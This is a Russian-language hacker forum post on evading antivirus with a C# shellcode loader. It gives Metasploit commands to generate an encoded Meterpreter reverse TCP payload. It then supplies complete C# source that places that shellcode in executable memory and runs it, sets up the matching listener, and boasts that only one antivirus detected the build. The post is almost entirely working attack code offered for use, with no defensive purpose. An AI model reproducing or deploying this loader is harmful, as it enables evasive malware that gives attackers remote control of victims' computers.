Привет. Господа хекеры. Рассмотрим вариант байпасса антивирусов с помощью языка C#.
Обо всё предлагаю по порядку и для начала сгенерируем полезную нагрузку в метасплоите.
Устанавливаем опции
И генерируем нашу нагрузку для языка C#
А дальше берем нагрузку и вставляем в код ниже в переменную buf
Далее поднимаем листенер
И компилируемый наш билд
После компиляции и запуска получаем сессию
А теперь ссылка со сканом нашей малвари.
Только один антивирус задетектил
Ссылка на скан:
НЕ ЛИТЬ НА ВИРУСТОТАЛ
Обо всё предлагаю по порядку и для начала сгенерируем полезную нагрузку в метасплоите.
Код:
use windows/meterpreter/reverse_tcp
Устанавливаем опции
Код:
set LHOST 192.168.1.237
set LPORT 1338
set EXITFUNC thread
Код:
generate -e x86/shikata_ga_nai -b '\x00' -i 3 -t csharp
А дальше берем нагрузку и вставляем в код ниже в переменную buf
Код:
using System;
using System.Runtime.InteropServices;
namespace ShellCodeByPass
{
public class Program
{
[Flags]
public enum AllocationType : uint
{
COMMIT = 0x1000,
RESERVE = 0x2000,
RESET = 0x80000,
LARGE_PAGES = 0x20000000,
PHYSICAL = 0x400000,
TOP_DOWN = 0x100000,
WRITE_WATCH = 0x200000
}
[Flags]
public enum MemoryProtection : uint
{
EXECUTE = 0x10,
EXECUTE_READ = 0x20,
EXECUTE_READWRITE = 0x40,
EXECUTE_WRITECOPY = 0x80,
NOACCESS = 0x01,
READONLY = 0x02,
READWRITE = 0x04,
WRITECOPY = 0x08,
GUARD_Modifierflag = 0x100,
NOCACHE_Modifierflag = 0x200,
WRITECOMBINE_Modifierflag = 0x400
}
public enum OpcodesToFree : uint
{
MEM_DECOMMIT = 0x4000,
MEM_RELEASE = 0x8000
}
[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, AllocationType flAllocationType, MemoryProtection flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32")]
private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, OpcodesToFree dwFreeType);
[UnmanagedFunctionPointerAttribute(CallingConvention.Cdecl)]
public delegate Int32 ExecuteDelegate();
public static void Main(string[] args)
{
byte[] buf = new byte[624] {
0x89,0xe7,0xdb,0xdc,0xd9,0x77,0xf4,0x5e,0x56,0x59,0x49,0x49,0x49,0x49,0x49,
0x49,0x49,0x49,0x49,0x49,0x43,0x43,0x43,0x43,0x43,0x43,0x37,0x51,0x5a,0x6a,
0x41,0x58,0x50,0x30,0x41,0x30,0x41,0x6b,0x41,0x41,0x51,0x32,0x41,0x42,0x32,
0x42,0x42,0x30,0x42,0x42,0x41,0x42,0x58,0x50,0x38,0x41,0x42,0x75,0x4a,0x49,
0x69,0x6c,0x59,0x78,0x4c,0x42,0x45,0x50,0x63,0x30,0x37,0x70,0x33,0x50,0x4b,
0x39,0x38,0x65,0x74,0x71,0x49,0x50,0x31,0x74,0x4e,0x6b,0x52,0x70,0x74,0x70,
0x4c,0x4b,0x42,0x72,0x76,0x6c,0x4e,0x6b,0x71,0x42,0x57,0x64,0x6e,0x6b,0x70,
0x72,0x31,0x38,0x76,0x6f,0x38,0x37,0x63,0x7a,0x55,0x76,0x46,0x51,0x4b,0x4f,
0x4e,0x4c,0x75,0x6c,0x30,0x61,0x73,0x4c,0x53,0x32,0x34,0x6c,0x51,0x30,0x4a,
0x61,0x78,0x4f,0x66,0x6d,0x75,0x51,0x59,0x57,0x58,0x62,0x79,0x62,0x42,0x72,
0x51,0x47,0x6e,0x6b,0x72,0x72,0x42,0x30,0x6e,0x6b,0x71,0x5a,0x47,0x4c,0x4c,
0x4b,0x50,0x4c,0x72,0x31,0x61,0x68,0x39,0x73,0x50,0x48,0x77,0x71,0x38,0x51,
0x32,0x71,0x4c,0x4b,0x43,0x69,0x31,0x30,0x43,0x31,0x4b,0x63,0x4e,0x6b,0x33,
0x79,0x62,0x38,0x78,0x63,0x54,0x7a,0x61,0x59,0x4e,0x6b,0x70,0x34,0x6e,0x6b,
0x35,0x51,0x69,0x46,0x54,0x71,0x49,0x6f,0x6c,0x6c,0x79,0x51,0x38,0x4f,0x74,
0x4d,0x33,0x31,0x38,0x47,0x45,0x68,0x39,0x70,0x52,0x55,0x6c,0x36,0x46,0x63,
0x33,0x4d,0x39,0x68,0x65,0x6b,0x51,0x6d,0x47,0x54,0x63,0x45,0x59,0x74,0x72,
0x78,0x6c,0x4b,0x51,0x48,0x65,0x74,0x45,0x51,0x68,0x53,0x73,0x56,0x6e,0x6b,
0x64,0x4c,0x32,0x6b,0x4e,0x6b,0x51,0x48,0x77,0x6c,0x46,0x61,0x7a,0x73,0x6e,
0x6b,0x45,0x54,0x4c,0x4b,0x47,0x71,0x4a,0x70,0x6e,0x69,0x51,0x54,0x45,0x74,
0x71,0x34,0x73,0x6b,0x61,0x4b,0x51,0x71,0x76,0x39,0x43,0x6a,0x70,0x51,0x6b,
0x4f,0x4b,0x50,0x71,0x4f,0x63,0x6f,0x33,0x6a,0x6c,0x4b,0x55,0x42,0x4a,0x4b,
0x4c,0x4d,0x33,0x6d,0x32,0x48,0x56,0x53,0x50,0x32,0x63,0x30,0x77,0x70,0x43,
0x58,0x63,0x47,0x62,0x53,0x50,0x32,0x61,0x4f,0x53,0x64,0x35,0x38,0x50,0x4c,
0x63,0x47,0x37,0x56,0x46,0x67,0x79,0x6f,0x7a,0x75,0x6d,0x68,0x5a,0x30,0x33,
0x31,0x55,0x50,0x57,0x70,0x34,0x69,0x79,0x54,0x72,0x74,0x36,0x30,0x61,0x78,
0x77,0x59,0x4b,0x30,0x72,0x4b,0x45,0x50,0x4b,0x4f,0x48,0x55,0x71,0x7a,0x56,
0x65,0x31,0x78,0x77,0x4e,0x4e,0x56,0x45,0x62,0x6e,0x46,0x45,0x38,0x47,0x72,
0x37,0x70,0x43,0x35,0x65,0x6a,0x4b,0x39,0x39,0x76,0x62,0x70,0x42,0x70,0x42,
0x70,0x56,0x30,0x43,0x70,0x52,0x70,0x73,0x70,0x42,0x70,0x61,0x78,0x7a,0x4a,
0x46,0x6f,0x79,0x4f,0x59,0x70,0x69,0x6f,0x6a,0x75,0x4f,0x67,0x33,0x5a,0x54,
0x50,0x36,0x36,0x30,0x57,0x35,0x38,0x7a,0x39,0x79,0x35,0x70,0x74,0x71,0x71,
0x39,0x6f,0x6e,0x35,0x4c,0x45,0x79,0x50,0x54,0x34,0x44,0x4c,0x39,0x6f,0x50,
0x4e,0x75,0x58,0x30,0x75,0x68,0x6c,0x55,0x38,0x48,0x70,0x4d,0x65,0x4c,0x62,
0x30,0x56,0x49,0x6f,0x4a,0x75,0x70,0x6a,0x57,0x70,0x50,0x6a,0x74,0x44,0x31,
0x46,0x63,0x67,0x52,0x48,0x44,0x42,0x49,0x49,0x79,0x58,0x63,0x6f,0x4b,0x4f,
0x48,0x55,0x4c,0x4b,0x70,0x36,0x32,0x4a,0x31,0x50,0x43,0x58,0x37,0x70,0x56,
0x70,0x75,0x50,0x63,0x30,0x73,0x66,0x53,0x5a,0x63,0x30,0x55,0x38,0x30,0x58,
0x49,0x34,0x33,0x63,0x5a,0x45,0x49,0x6f,0x49,0x45,0x4e,0x73,0x56,0x33,0x61,
0x7a,0x73,0x30,0x52,0x76,0x73,0x63,0x52,0x77,0x53,0x58,0x63,0x32,0x68,0x59,
0x48,0x48,0x53,0x6f,0x79,0x6f,0x7a,0x75,0x43,0x31,0x79,0x53,0x47,0x59,0x39,
0x56,0x34,0x35,0x5a,0x4e,0x39,0x53,0x41,0x41
};
byte[] schell = new byte[buf.Length];
for (int i = 0; i < buf.Length; i++)
{
schell[i] = Convert.ToByte(buf[i]);
}
IntPtr baseAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)(schell.Length + 1), AllocationType.RESERVE | AllocationType.COMMIT, MemoryProtection.EXECUTE_READWRITE);
System.Diagnostics.Debug.Assert(baseAddr != IntPtr.Zero, "Error: Couldn't allocate remote memory");
try
{
Marshal.Copy(schell, 0, baseAddr, schell.Length);
ExecuteDelegate del = (ExecuteDelegate)Marshal.GetDelegateForFunctionPointer(baseAddr, typeof(ExecuteDelegate));
del();
}
finally
{
VirtualFree(baseAddr, 0, OpcodesToFree.MEM_RELEASE);
}
}
}
}
Код:
use exploit/multi/handler
set LHOST 192.168.1.237
set LPORT 1338
set PAYLOAD windows/meterpreter/reverse_tcp
И компилируемый наш билд
После компиляции и запуска получаем сессию
А теперь ссылка со сканом нашей малвари.
Только один антивирус задетектил
Ссылка на скан:
Ссылка скрыта от гостей
НЕ ЛИТЬ НА ВИРУСТОТАЛ
Последнее редактирование: